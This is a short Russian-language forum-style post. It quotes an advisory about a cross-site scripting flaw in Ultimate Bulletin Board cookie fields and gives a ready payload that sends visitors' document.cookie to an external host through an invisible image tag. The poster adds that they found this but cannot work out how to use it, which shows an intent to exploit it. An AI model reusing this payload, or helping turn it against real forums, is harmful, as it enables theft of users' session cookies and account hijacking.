Удаленный авторизованный пользователь может внедрить произвольный HTML код в некоторые поля в куки Ultimate Bulletin Board, которые будут отображены в странице краткого обзора или в странице последних сообщений форума. Пример:

username<script>document.write('<img src%3D"http://someserver/savereq.php?'%2Bdocument.cookie%2B'" width%3D0height%3D0>')</script>


вот нарыд это но немогу понять как это использовать